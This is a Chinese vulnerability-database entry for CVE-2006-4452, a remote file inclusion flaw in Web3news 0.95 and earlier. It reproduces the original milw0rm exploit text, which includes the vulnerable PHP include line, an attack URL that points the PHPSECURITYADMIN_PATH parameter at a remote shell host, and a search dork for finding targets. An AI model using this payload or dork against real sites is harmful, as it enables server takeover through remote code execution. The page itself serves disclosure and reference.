Web3news '_class.security.php' PHPSECURITYADMIN_PATH变量远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110905 漏洞类型 输入验证
发布时间 2006-08-28 更新时间 2006-08-31
CVE编号 CVE-2006-4452 CNNVD-ID CNNVD-200608-482
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2269
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-482
|漏洞详情
Web3news是一款开源的邮件和新闻组服务器。Web3news处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。Web3news没有正确地验证security/include/_class.security.php文件中对PHPSECURITYADMIN_PATH参数的输入,允许远程攻击者可以通过包含本地和外部资源的任意文件导致执行任意代码。成功的攻击要求打开了register_globals。
|漏洞EXP
#==============================================================================================
#Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.web3king.com/web3news           
#                                                                           
#Version : All Versions                                                
#                                                             
#================================================================================================
#Bug in : security/include/_class.security.php
#
#Vlu Code :
#--------------------------------
#     <?
#                include $PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php";
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?
#
#Example : http://www.web3king.com/web3news/  ======> Vendor site
#
#DOrk : allinurl : /web3news/
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-08-28]
|参考资料

来源:BID
名称:19744
链接:http://www.securityfocus.com/bid/19744
来源:MILW0RM
名称:2269
链接:http://www.milw0rm.com/exploits/2269
来源:SECUNIA
名称:21640
链接:http://secunia.com/advisories/21640
来源:XF
名称:web3news-security-file-include(28618)
链接:http://xforce.iss.net/xforce/xfdb/28618
来源:OSVDB
名称:28248
链接:http://www.osvdb.org/28248
来源:VUPEN
名称:ADV-2006-3407
链接:http://www.frsirt.com/english/advisories/2006/3407
来源:MILW0RM
名称:2269
链接:http://milw0rm.com/exploits/2269